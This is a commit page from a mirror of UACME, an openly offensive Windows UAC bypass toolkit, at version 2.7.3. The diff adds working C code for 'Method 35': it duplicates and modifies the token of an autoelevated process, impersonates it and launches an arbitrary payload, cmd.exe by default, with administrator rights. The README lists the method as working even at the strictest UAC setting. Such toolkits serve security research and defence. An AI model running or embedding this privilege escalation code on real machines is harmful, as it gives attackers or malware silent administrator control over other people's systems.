Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 2.7.3 

Method 35 added, readme updated.
This commit is contained in:
hfiref0x 2017-05-27 18:01:47 +07:00
parent 70df6d2d30
commit 34a5cc2ca0
15 changed files with 576 additions and 74 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Akagi32.exe
View File

Binary file not shown.

BIN
Compiled/Akagi64.exe
View File

Binary file not shown.

17
README.md
View File

@ -288,6 +288,15 @@ Keys (watch debug output with dbgview or similar for more info):
* AlwaysNotify compatible
* Fixed in: unfixed :see_no_evil:
* How: -
35. Author: CIA & James Forshaw
* Type: Impersonation
* Method: Token Manipulations
* Target(s): Autoelevated applications
* Component(s): Attacker defined applications
* Works from: Windows 7 (7600)
* AlwaysNotify compatible, see note
* Fixed in: unfixed :see_no_evil:
* How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;
@ -295,7 +304,8 @@ Note:
* Method (13) (19) and above implemented only in x64 version;
* Method (14) require process injection, wow64 unsupported, use x64 version of this tool;
* Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;
* Method (30) require x64 because it abuses WOW64 subsystem feature.
* Method (30) require x64 because it abuses WOW64 subsystem feature;
* Method (35) AlwaysNotify compatible as there always will be running autoelevated apps or user will have to launch them anyway.
Run examples:
* akagi32.exe 1
@ -317,7 +327,6 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
# Protection
* UAC turned on maximum level and full awareness about every window it will show;
* Account without administrative privileges.
# Malware usage
@ -348,6 +357,10 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
* UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/
* Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
* First entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
* Reading Your Way Around UAC in 3 parts:
1. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
2. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
3. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
# Authors

BIN
Source/Akagi/Resource.rc
View File

Binary file not shown.

12
Source/Akagi/methods/enigma0x3.c
View File

@ -4,9 +4,9 @@
*
* TITLE: ENIGMA0X3.C
*
* VERSION: 2.72
* VERSION: 2.73
*
* DATE: 26 May 2017
* DATE: 27 May 2017
*
* Enigma0x3 autoelevation methods and everything based on the same
* ShellExecute related registry manipulations idea.
@ -477,16 +477,16 @@ BOOL ucmSdcltIsolatedCommandMethod(
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
sz = _strlen(lpszPayload);
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
sz = _strlen(szBuffer);
lpBuffer = szBuffer;
}
sz = _strlen(lpBuffer);
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_EXEFILE_SHELL, 0, NULL,
REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
@ -586,16 +586,16 @@ BOOL ucmMsSettingsDelegateExecuteMethod(
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
sz = _strlen(lpszPayload);
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
sz = _strlen(szBuffer);
lpBuffer = szBuffer;
}
sz = _strlen(lpBuffer);
_strcpy(szKey, T_MSSETTINGS);
_strcat(szKey, T_SHELL_OPEN_COMMAND);
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL,

28
Source/Akagi/methods/methods.c
View File

@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
* VERSION: 2.72
* VERSION: 2.73
*
* DATE: 26 May 2017
* DATE: 27 May 2017
*
* UAC bypass dispatch.
*
@ -46,6 +46,7 @@ UCM_API(MethodEnigma0x3_4);
UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
UCM_API(MethodTokenMod);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@ -82,7 +83,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodEnigma0x3_4, NULL, {10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodUiAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsSettings, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
{ MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
};
/*
@ -664,3 +666,23 @@ UCM_API(MethodTyranid)
return ucmDiskCleanupEnvironmentVariable(lpszPayload);
}
UCM_API(MethodTokenMod)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Method);
UNREFERENCED_PARAMETER(ExtraContext);
UNREFERENCED_PARAMETER(PayloadCode);
UNREFERENCED_PARAMETER(PayloadSize);
//
// Select target application or use given by optional parameter.
//
if (g_ctx.OptionalParameterLength == 0)
lpszPayload = NULL;
else
lpszPayload = g_ctx.szOptionalParameter;
return ucmTokenModification(lpszPayload);
}

5
Source/Akagi/methods/methods.h
View File

@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
* VERSION: 2.72
* VERSION: 2.73
*
* DATE: 26 May 2017
* DATE: 27 May 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@ -54,6 +54,7 @@ typedef enum _UCM_METHOD {
UacMethodUiAccess, //+
UacMethodMsSettings, //+
UacMethodTyranid, //+
UacMethodTokenMod, //+
UacMethodMax
} UCM_METHOD;

234
Source/Akagi/methods/tyranid.c
View File

@ -1,14 +1,15 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TYRANID.C
*
* VERSION: 2.72
* VERSION: 2.73
*
* DATE: 26 May 2017
* DATE: 27 May 2017
*
* James Forshaw autoelevation method(s)
* Fine Dinning Tool (c) CIA
*
* For description please visit original URL
* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
@ -21,14 +22,12 @@
*******************************************************************************/
#include "global.h"
/*
* ucmDiskCleanupEnvironmentVariable
*
* Purpose:
*
* Use cleanmgr innovation implemented in Windows 10+.
* Cleanmgr.exe uses current user environment variables to build a path to the executable task.
* DiskCleanup task uses current user environment variables to build a path to the executable.
* Warning: this method works with AlwaysNotify UAC level.
*
*/
@ -81,3 +80,226 @@ BOOL ucmDiskCleanupEnvironmentVariable(
return bResult;
}
/*
* ucmTokenModification
*
* Purpose:
*
* Obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator.
*
*/
BOOL ucmTokenModification(
_In_opt_ LPWSTR lpszPayload
)
{
BOOL bCond = FALSE, bResult = FALSE;
NTSTATUS Status = STATUS_UNSUCCESSFUL;
HANDLE hProcessToken = NULL, hDupToken = NULL, hLuaToken = NULL, hImpToken = NULL;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
PSID pIntegritySid = NULL;
TOKEN_MANDATORY_LABEL tml;
SECURITY_QUALITY_OF_SERVICE sqos;
OBJECT_ATTRIBUTES obja;
LPWSTR lpBuffer = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
SHELLEXECUTEINFO shinfo;
WCHAR szBuffer[MAX_PATH + 1];
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
do {
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
lpBuffer = szBuffer;
}
//
// Run autoelevated app (any).
//
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = WUSA_EXE;
shinfo.nShow = SW_HIDE;
if (!ShellExecuteEx(&shinfo)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->ShellExecute"),
GetLastError());
#endif
break;
}
//
// Open token of elevated process.
//
Status = NtOpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken);
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->NtOpenProcessToken"),
Status);
#endif
break;
}
//
// Duplicate primary token.
//
sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
sqos.ImpersonationLevel = SecurityImpersonation;
sqos.ContextTrackingMode = 0;
sqos.EffectiveOnly = FALSE;
InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
obja.SecurityQualityOfService = &sqos;
Status = NtDuplicateToken(hProcessToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken);
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->NtDuplicateToken"),
Status);
#endif
break;
}
//
// Lower duplicated token IL from High to Medium.
//
Status = RtlAllocateAndInitializeSid(&MLAuthority,
1, SECURITY_MANDATORY_MEDIUM_RID,
0, 0, 0, 0, 0, 0, 0,
&pIntegritySid);
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->RtlAllocateAndInitializeSid"),
Status);
#endif
break;
}
tml.Label.Attributes = SE_GROUP_INTEGRITY;
tml.Label.Sid = pIntegritySid;
Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,
sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->NtSetInformationToken"),
Status);
#endif
break;
}
//
// Create restricted token.
//
Status = NtFilterToken(hDupToken, LUA_TOKEN, NULL, NULL, NULL, &hLuaToken);
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->NtFilterToken"),
Status);
#endif
break;
}
//
// Impersonate logged on user.
//
hImpToken = NULL;
Status = NtDuplicateToken(hLuaToken, TOKEN_IMPERSONATE | TOKEN_QUERY,
&obja,
FALSE,
TokenImpersonation,
&hImpToken);
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->NtDuplicateToken2"),
Status);
#endif
break;
}
Status = NtSetInformationThread(
NtCurrentThread(),
ThreadImpersonationToken,
&hImpToken,
sizeof(HANDLE));
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->NtSetInformationThread"),
Status);
#endif
break;
}
NtClose(hImpToken);
hImpToken = NULL;
//
// Run target.
//
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
GetStartupInfo(&si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
RtlSecureZeroMemory(&pi, sizeof(pi));
bResult = CreateProcessWithLogonW(TEXT("uac"), TEXT("is"), TEXT("useless"),
LOGON_NETCREDENTIALS_ONLY,
lpBuffer,
NULL, 0, NULL, NULL,
&si, &pi);
if (bResult) {
if (pi.hThread) CloseHandle(pi.hThread);
if (pi.hProcess) CloseHandle(pi.hProcess);
}
//
// Revert to self.
//
hImpToken = NULL;
Status = NtSetInformationThread(
NtCurrentThread(),
ThreadImpersonationToken,
(PVOID)&hImpToken,
sizeof(HANDLE));
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
TEXT("ucmTokenModification->NtSetInformationThread2"),
Status);
#endif
}
} while (bCond);
if (hImpToken) NtClose(hImpToken);
if (hProcessToken) NtClose(hProcessToken);
if (hDupToken) NtClose(hDupToken);
if (hLuaToken) NtClose(hLuaToken);
if (shinfo.hProcess) NtClose(shinfo.hProcess);
if (pIntegritySid) RtlFreeSid(pIntegritySid);
RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
return bResult;
}

9
Source/Akagi/methods/tyranid.h
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: TYRANID.H
*
* VERSION: 2.72
* VERSION: 2.73
*
* DATE: 26 May 2017
* DATE: 27 May 2017
*
* Prototypes and definitions for James Forshaw method(s).
*
@ -20,3 +20,6 @@
BOOL ucmDiskCleanupEnvironmentVariable(
_In_opt_ LPWSTR lpszPayload);
BOOL ucmTokenModification(
_In_opt_ LPWSTR lpszPayload);

50
Source/Hibiki/hibiki.suppress Normal file
View File

@ -0,0 +1,50 @@
<?xml version="1.0" standalone="yes"?>
<NewDataSet>
<xs:schema id="NewDataSet" xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xs:element name="NewDataSet" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:element name="SuppressVersion">
<xs:complexType>
<xs:sequence>
<xs:element name="CurrentVersion" type="xs:int" minOccurs="0" />
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Hibiki">
<xs:complexType>
<xs:sequence>
<xs:element name="FileName" type="xs:string" default="" />
<xs:element name="ErrorCode" type="xs:string" default="" />
<xs:element name="Message" type="xs:string" default="" />
<xs:element name="CodePrev" type="xs:unsignedInt" default="0" />
<xs:element name="CodeCurrent" type="xs:unsignedInt" default="0" />
<xs:element name="CodeNext" type="xs:unsignedInt" default="0" />
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:choice>
</xs:complexType>
<xs:unique name="Constraint1" msdata:PrimaryKey="true">
<xs:selector xpath=".//Hibiki" />
<xs:field xpath="FileName" />
<xs:field xpath="ErrorCode" />
<xs:field xpath="Message" />
<xs:field xpath="CodePrev" />
<xs:field xpath="CodeCurrent" />
<xs:field xpath="CodeNext" />
</xs:unique>
</xs:element>
</xs:schema>
<SuppressVersion>
<CurrentVersion>2</CurrentVersion>
</SuppressVersion>
<Hibiki>
<FileName>rtltypes.h</FileName>
<ErrorCode>V112</ErrorCode>
<Message>Dangerous magic number _x_ used: return c + _x_;.</Message>
<CodePrev>172268903</CodePrev>
<CodeCurrent>355059</CodeCurrent>
<CodeNext>539</CodeNext>
</Hibiki>
</NewDataSet>

8
Source/Inazuma/main.c
View File

@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 2.70
* VERSION: 2.73
*
* DATE: 24 Mar 2017
* DATE: 27 May 2017
*
* ShellCode.
*
@ -19,6 +19,10 @@
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include <Windows.h>
#include "shared\ntos.h"

94
Source/Naka/Naka.vcxproj
View File

@ -5,6 +5,14 @@
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="ReleaseInternal|Win32">
<Configuration>ReleaseInternal</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="ReleaseInternal|x64">
<Configuration>ReleaseInternal</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
@ -38,6 +46,13 @@
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
@ -51,6 +66,13 @@
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
@ -62,12 +84,18 @@
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
@ -90,6 +118,13 @@
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
@ -97,6 +132,13 @@
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
@ -130,6 +172,32 @@
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SetChecksum>true</SetChecksum>
<EntryPointSymbol>main</EntryPointSymbol>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
@ -155,6 +223,32 @@
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SetChecksum>true</SetChecksum>
<EntryPointSymbol>main</EntryPointSymbol>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>

152
Source/Shared/ntos.h
View File

@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
* VERSION: 1.66
* VERSION: 1.70
*
* DATE: 02 May 2017
* DATE: 27 May 2017
*
* Common header file for the ntos API functions and definitions.
*
@ -1142,6 +1142,37 @@ typedef struct _OBJECT_HANDLE_FLAG_INFORMATION
** Objects END
*/
/*
** Boot Entry START
*/
typedef struct _FILE_PATH {
ULONG Version;
ULONG Length;
ULONG Type;
UCHAR FilePath[ANYSIZE_ARRAY];
} FILE_PATH, *PFILE_PATH;
typedef struct _BOOT_ENTRY {
ULONG Version;
ULONG Length;
ULONG Id;
ULONG Attributes;
ULONG FriendlyNameOffset;
ULONG BootFilePathOffset;
ULONG OsOptionsLength;
UCHAR OsOptions[ANYSIZE_ARRAY];
} BOOT_ENTRY, *PBOOT_ENTRY;
typedef struct _BOOT_ENTRY_LIST {
ULONG NextEntryOffset;
BOOT_ENTRY BootEntry;
} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;
/*
** Boot Entry END
*/
/*
** File start
*/
@ -4602,7 +4633,7 @@ BOOLEAN NTAPI RtlCreateUnicodeString(
VOID NTAPI RtlInitUnicodeString(
_Inout_ PUNICODE_STRING DestinationString,
_In_ PCWSTR SourceString
_In_opt_ PCWSTR SourceString
);
BOOLEAN NTAPI RtlEqualUnicodeString(
@ -5565,6 +5596,42 @@ NTSTATUS NTAPI NtOpenProcessToken(
_Out_ PHANDLE TokenHandle
);
NTSTATUS NTAPI NtDuplicateToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ BOOLEAN EffectiveOnly,
_In_ TOKEN_TYPE TokenType,
_Out_ PHANDLE NewTokenHandle
);
NTSTATUS NTAPI NtFilterToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ULONG Flags,
_In_opt_ PTOKEN_GROUPS SidsToDisable,
_In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
_In_opt_ PTOKEN_GROUPS RestrictedSids,
_Out_ PHANDLE NewTokenHandle
);
NTSTATUS NTAPI NtImpersonateAnonymousToken(
_In_ HANDLE ThreadHandle
);
NTSTATUS NTAPI NtQueryInformationToken(
_In_ HANDLE TokenHandle,
_In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
_Out_ PVOID TokenInformation,
_In_ ULONG TokenInformationLength,
_Out_ PULONG ReturnLength
);
NTSTATUS NTAPI NtSetInformationToken(
_In_ HANDLE TokenHandle,
_In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
_In_ PVOID TokenInformation,
_In_ ULONG TokenInformationLength
);
NTSTATUS NTAPI NtOpenThreadTokenEx(
_In_ HANDLE ThreadHandle,
@ -5591,6 +5658,20 @@ NTSTATUS NTAPI NtQueryInformationToken(
_Out_ PULONG ReturnLength
);
#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
#define SANDBOX_INERT 0x2 // winnt
#define LUA_TOKEN 0x4
#define WRITE_RESTRICT 0x8
NTSTATUS NTAPI NtFilterToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ULONG Flags,
_In_opt_ PTOKEN_GROUPS SidsToDisable,
_In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
_In_opt_ PTOKEN_GROUPS RestrictedSids,
_Out_ PHANDLE NewTokenHandle
);
NTSTATUS NTAPI NtCreateKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
@ -5691,19 +5772,6 @@ NTSTATUS NTAPI NtQueryFullAttributesFile(
__out PFILE_NETWORK_OPEN_INFORMATION FileInformation
);
NTSTATUS NTAPI NtFsControlFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG FsControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_ PVOID OutputBuffer,
_In_ ULONG OutputBufferLength
);
NTSTATUS NTAPI NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
@ -5888,6 +5956,32 @@ NTSTATUS NTAPI NtCreateFile(
_In_ ULONG EaLength
);
NTSTATUS NTAPI NtDeviceIoControlFile(
_In_ HANDLE FileHandle,
_In_ HANDLE Event,
_In_ PIO_APC_ROUTINE ApcRoutine,
_In_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_ PVOID OutputBuffer,
_In_ ULONG OutputBufferLength
);
NTSTATUS NTAPI NtFsControlFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG FsControlCode,
_In_opt_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_opt_ PVOID OutputBuffer,
_In_ ULONG OutputBufferLength
);
NTSTATUS NTAPI NtCreateUserProcess(
_Out_ PHANDLE ProcessHandle,
_Out_ PHANDLE ThreadHandle,
@ -6177,34 +6271,29 @@ NTSTATUS NTAPI NtAcceptConnectPort(
_In_ PPORT_MESSAGE ConnectionRequest,
_In_ BOOLEAN AcceptConnection,
_Inout_opt_ PPORT_VIEW ServerView,
_Out_opt_ PREMOTE_PORT_VIEW ClientView
);
_Out_opt_ PREMOTE_PORT_VIEW ClientView);
typedef
VOID
(*PPS_APC_ROUTINE) (
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
_In_opt_ PVOID ApcArgument3
);
_In_opt_ PVOID ApcArgument3);
NTSTATUS NTAPI NtQueueApcThread(
_In_ HANDLE ThreadHandle,
_In_ PPS_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
_In_opt_ PVOID ApcArgument3
);
_In_opt_ PVOID ApcArgument3);
NTSTATUS NTAPI NtWaitForSingleObject(
_In_ HANDLE Handle,
